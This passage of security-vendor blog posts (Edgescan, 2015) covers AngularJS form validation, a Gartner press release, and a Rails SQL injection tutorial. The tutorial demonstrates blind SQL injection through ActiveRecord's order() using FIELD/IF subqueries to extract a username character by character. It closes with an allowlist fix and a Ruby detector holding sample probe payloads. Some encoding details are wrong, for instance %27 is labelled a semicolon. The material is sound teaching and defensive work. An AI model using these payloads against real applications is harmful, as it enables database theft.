`ng-class="{ 'has-error' : userCreate.email.$invalid && !userCreate.email.$pristine }"`

The `ng-class` helper allows us to create a condition to check a) if the email address is valid according to the regex (`userCreate.email.$invalid`) and b) if any value has been input into the field (`userCreate.email.$pristine`). Where

will be triggered by the `ng-show` helper, which gets executed if the email address is invalid, prompting the user with the message “Enter a valid email.”

#### Conclusion

In the same way we have incorporated client-side validation into the email field, we can take the same approach with any type of input field, always remembering that client-side validation should be related to usability principles rather than security. Any security concerns should be handled at the server side. edgescan™ can help you detect security loopholes in your code base and help you remediate and mitigate the risks of such security concerns.

Author: Javier Rossetti, software developer @ edgescan™ – July 2015

### edgescan is a “Sample Vendor” in the Gartner Hype Cycle for Application Security, 2015

Edgescan: “sample vendor” in the Gartner Hype Cycle for Application Security, Software as a Service (SaaS) and Cloud Security 2015

Date: 27/7/2015, Dublin, Ireland

edgescan, the leading provider of web application and server risk management solutions, announced today that it has been listed as a “sample vendor” in the Gartner Hype Cycle for Application Security, Software as a Service (SaaS) and Cloud Security 2015.

“This validates our approach to vulnerability management. After providing Gartner with numerous vendor briefings, our approach to combining both Layer-7 (Web Applications) and Hosting infrastructure vulnerability management as one service is proving positive.” – Rahim Jina, Director with BCC Risk Advisory, Edgescan’s parent company.

“Hackers don’t really care if a vulnerability is in the web application layer or the hosting layer of a system’s technical stack. Attackers attack the weakest point regardless.
edgescan provides superior coverage across all layers, combining full-stack automation with manual validation of all discovered vulnerabilities.” – Eoin Keary (CTO)

For further information, please contact us: Email: info@edgescan.com, +353 (1) 681 5330

### “Vulnerability Management and Threat Detection by the Numbers” – Eoin Keary Keynote Speaker at Daggercon 2015

Our CTO, Eoin Keary, delivered a keynote speech at Daggercon 2015 on “Vulnerability Management and Threat Detection by the Numbers”. Please feel free to share this material with others as a work aid for building more secure code and applications.

Vulnerability Management and Threat Detection by the Numbers – Daggercon 2015

### Rails SQL injection gotchas

In this post we're gonna look at some places where it is possible to inject arbitrary SQL commands into ActiveRecord queries in Ruby on Rails. ActiveRecord has pretty good protection against SQL injection, so much so that sometimes I think it lulls us into a false sense of security.

We're pretty well protected by default for `where` queries. Consider the following code:

```ruby
@posts = Post.where(:title => params[:title])
```

This code will take the value of the URL parameter `title` and insert it into a query. So if we make a request like:

```
GET /posts?title=whatever
```

we'll get the following SQL:

```sql
SELECT `posts`.* FROM `posts` WHERE `posts`.`title` = 'whatever'
```

So we know that we can insert text into the SQL query; let's try a standard SQL injection attack vector:

```
GET /posts?title=whatever'%20OR1=1
```

SQL:

```sql
SELECT `posts`.* FROM `posts` WHERE `posts`.`title` = 'whatever' OR 1=1'
```

Rails automatically escapes the single quotes, preventing us from breaking out of context here. What about integral columns?
Let's say we have the following code:

```ruby
@posts = Post.where(:score => params[:score])
```

So we make a request like so:

```
GET /posts?score=5
```

and we get the following SQL:

```sql
SELECT `posts`.* FROM `posts` WHERE `posts`.`score` = 5
```

Now there are no longer any single quotation marks around our URL parameter when it gets incorporated into our query. This should make things easier, right?

```
GET /posts?score=5%20OR1=1
```

SQL:

```sql
SELECT `posts`.* FROM `posts` WHERE `posts`.`score` = 5
```

Nope. Only the numeric part of the parameter is included in the query; anything following the numeric part is discarded.

So incorporating URL parameters into `where` arguments is safe, as long as we use the hash form. (I'm assuming that most developers know better than to use string interpolation with untrusted data!) But other ActiveRecord query methods are not so safe. Consider the following code:

```ruby
@posts = Post.order(params[:order_column])
```

This seems pretty innocuous. It provides us with an easy way of specifying the ordering of Post records, without having to write any complex logic. So we might make a request like so:

```
GET /posts?order_column=title
```

and get the following query:

```sql
SELECT `posts`.* FROM `posts` ORDER BY title
```

Hmmm, this looks interesting. There are no quotes around `title`. What about:

```
GET /posts?order_column=%27%3B--
```

This is just `;'--` URL encoded. SQL:

```sql
SELECT `posts`.* FROM `posts` ORDER BY ;'--
```

This causes a database error, but it shows that the query incorporates the `order_column` URL parameter verbatim. So what can we do with this? SQL does not allow conditions to be set after the ORDER BY clause, so that limits our avenues of attack. Let's try adding our own data to the posts table.
We can use a semicolon (%27) to delimit successive queries, so after the SELECT we can add an INSERT:

```
GET /posts?order_column=title%27%20INSERT%20INTO%posts(content)%20VALUES%20('%3Cscript%3Ealert(1234)%3C%2Fscript%3E')
```

This generates the following SQL:

```sql
SELECT `posts`.* FROM `posts` ORDER BY title; INSERT INTO posts(content) VALUES ('')
```

This looks right, but (un)fortunately we get a DB error. ActiveRecord queries are constrained to only allow one SELECT; adding a further query or update will cause an error. This means that it's not possible (as far as I am aware) to insert arbitrary data into the database using this method. However, we can get data out of the database using blind SQL injection.

Blind SQL injection refers to SQL injection techniques where the result of the injected query is not directly measurable. In this case, we can't force the application to show us Post records that it would not otherwise display. What we need is a way of altering the query so that, under some conditions, the returned Post records are different.

One solution I've played around with is using the ORDER BY FIELD syntax in MySQL. This requires that we know the numeric id of the first post returned, which is usually pretty easy to find out when the application follows REST principles. Let's say the Post index method gives us the following records:

```
GET /posts.json
```

I'm using JSON to display the results here, but the technique should also apply to the HTML format, assuming you can get the numeric ids from the markup or otherwise. We can see that the results are ordered by the id column. Let's try the ORDER BY FIELD technique:

```
GET /posts.json?order_column=FIELD(id, 1)
```

This seems counter-intuitive at first: we've ordered by the id column in the list, and it's put the Post with id 2 first. This is because FIELD is a function that returns the position of the value given in the first argument in the list given as the remaining arguments.
It is indexed from 1, and for any value that does not appear in the list it returns 0. This means the record with id 2 will come first, since the value of FIELD in that case is 0. If we try the following request:

```
GET /posts.json?order_column=FIELD(id, 0)
```

we will get the original ordering back.

Now we need to add a conditional to the request. In MySQL (probably others also) we can use IF as follows:

```
GET /posts.json?order_column=FIELD(id, IF(true, 0, 1))
GET /posts.json?order_column=FIELD(id, IF(false, 0, 1))
```

These two requests should return different orderings of posts.

To actually retrieve some data, we need to use subqueries. We're gonna cheat a little bit here and assume we know that there is a users table with a name column. We're gonna try and get the name of the first user in the database. We can only ask true or false questions, so this takes a little bit of time. The procedure we'll use is to check whether the column value is lexicographically less than some value (i.e. would come before it in alphabetical ordering), and use bisection to reduce the number of checks.

```
GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'm', 0, 1)) #T
GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'g', 0, 1)) #T
GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'd', 0, 1)) #T
GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'b', 0, 1)) #T
GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'a', 0, 1)) #F # first character is 'a'
GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'am', 0, 1)) #T
GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'ag', 0, 1)) #T
GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'ad', 0, 1)) #T
GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) < 'ae', 0, 1)) #F # second character is 'd'
```

....
After a few more requests:

```
GET /posts.json?order_column=FIELD(id, IF((SELECT name FROM users LIMIT 1) = 'admin', 0, 1)) #T
```

You can see that in the last request I changed the less-than sign to basic equality as a sort of sanity check. So the first name in the users table is admin; to get further users, we can use OFFSET and get the rest of them.

In conclusion, the SQL injection protection in Rails is not a magic bullet; you still need to think about how attacker-controlled data might be incorporated into SQL queries. The solution for the above issue would be to whitelist the possible orderings. This can be achieved using something like the following code:

```ruby
order_column = 'title'
if Post.column_names.include?(params[:order_column])
  order_column = params[:order_column]
end
@posts = Post.order(order_column)
```

Check out how common SQL injection is in the real world, and get insight into other vulnerabilities detected by edgescan on a daily basis here: 2014 edgescan vulnerability report.

#### Stopping SQL Injections with DAST

SQL injections are a persistent threat, and we're here to help. At Edgescan, our Dynamic Application Security Testing (DAST) service actively identifies and mitigates SQL injection vulnerabilities to protect your applications. With teams in Dublin and New York, we ensure your systems are safe from exploitation.
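Returning to the whitelist fix at the end of the Rails post above: as an added example (not code from the post or from Edgescan), here is the same idea in plain Ruby without ActiveRecord, with the vulnerable interpolation next to the hardened version, a sort-direction parameter handled the same way, and a check over constructed access-log lines that flags `order_column` values which are not bare identifiers. The `PostOrdering` module name, the column list (standing in for `Post.column_names`) and the log-line format are assumptions.

```ruby
# Added example, not code from the Edgescan post: the post's allowlist fix
# in plain Ruby, beside the vulnerable interpolation, plus a log check for
# the same parameter. No ActiveRecord; ALLOWED_COLUMNS stands in for
# Post.column_names and the access-log format is an assumption.
require 'uri'

module PostOrdering
  # Stand-in for Post.column_names: the only column names we will ever emit.
  ALLOWED_COLUMNS    = %w[id title score created_at].freeze
  ALLOWED_DIRECTIONS = %w[asc desc].freeze
  DEFAULT_COLUMN     = 'title'

  # The gotcha from the post: the parameter lands in the SQL verbatim,
  # so "FIELD(id, 1)" or "';--" go straight through to the database.
  def self.unsafe_query(order_param)
    "SELECT `posts`.* FROM `posts` ORDER BY #{order_param}"
  end

  # Hardened form: user input is only ever compared against the allowlist,
  # never copied into the SQL; anything unknown falls back to the default.
  # Sort direction is handled the same way, since "title DESC" would also
  # fail a bare column check and a second parameter is the usual design.
  def self.order_clause(column_param, direction_param = 'asc')
    column = ALLOWED_COLUMNS.include?(column_param) ? column_param : DEFAULT_COLUMN
    dir    = direction_param.to_s.downcase
    dir    = 'asc' unless ALLOWED_DIRECTIONS.include?(dir)
    "`#{column}` #{dir.upcase}"
  end

  def self.safe_query(column_param, direction_param = 'asc')
    "SELECT `posts`.* FROM `posts` ORDER BY #{order_clause(column_param, direction_param)}"
  end

  # Detection side: a legitimate order_column is a bare identifier. Anything
  # with parentheses, quotes, spaces, a semicolon or a stray percent sign is
  # worth an alert even when the allowlist has already neutralised it.
  IDENTIFIER = /\A[A-Za-z_][A-Za-z0-9_]*\z/

  def self.suspicious_order_value?(decoded_value)
    !IDENTIFIER.match?(decoded_value)
  end

  # Scan access-log lines of the (constructed) form
  #   <ip> "GET <path> HTTP/1.1" <status>
  # and return [path, decoded order_column] for each request whose
  # order_column is not a plain identifier.
  def self.flag_requests(log_lines)
    log_lines.filter_map do |line|
      path  = line[/"(?:GET|POST) (\S+) HTTP/, 1] or next
      query = path.split('?', 2)[1] or next
      begin
        pairs = URI.decode_www_form(query)   # percent-decodes keys and values
      rescue ArgumentError                    # non-ASCII or otherwise unparseable
        next([path, '<undecodable query string>'])
      end
      value = pairs.assoc('order_column')&.last or next
      suspicious_order_value?(value) ? [path, value] : nil
    end
  end
end

# Constructed log lines: two ordinary requests, two that mirror the post's
# probes (percent-encoded as a browser would send them) and one with a
# broken percent sequence that never comes from the real UI.
SAMPLE_LOG = [
  '10.0.0.5 "GET /posts?order_column=title HTTP/1.1" 200',
  '10.0.0.5 "GET /posts?score=5 HTTP/1.1" 200',
  '10.0.0.9 "GET /posts.json?order_column=FIELD(id%2C%201) HTTP/1.1" 200',
  '10.0.0.9 "GET /posts?order_column=%27%3B-- HTTP/1.1" 500',
  '10.0.0.9 "GET /posts?order_column=title%ZZ HTTP/1.1" 400'
].freeze

if __FILE__ == $PROGRAM_NAME
  puts PostOrdering.safe_query('FIELD(id, 1)')   # allowlist falls back to `title` ASC
  PostOrdering.flag_requests(SAMPLE_LOG).each { |path, v| puts "ALERT #{path} => #{v.inspect}" }
end
```

In a real controller the allowlist comparison happens before the value ever reaches `Post.order`, which is exactly what the post's snippet does; the extra piece here is that the detection rule still fires on the FIELD and quote probes after the allowlist has neutralised them, so an attempt shows up in monitoring rather than silently sorting by `title`.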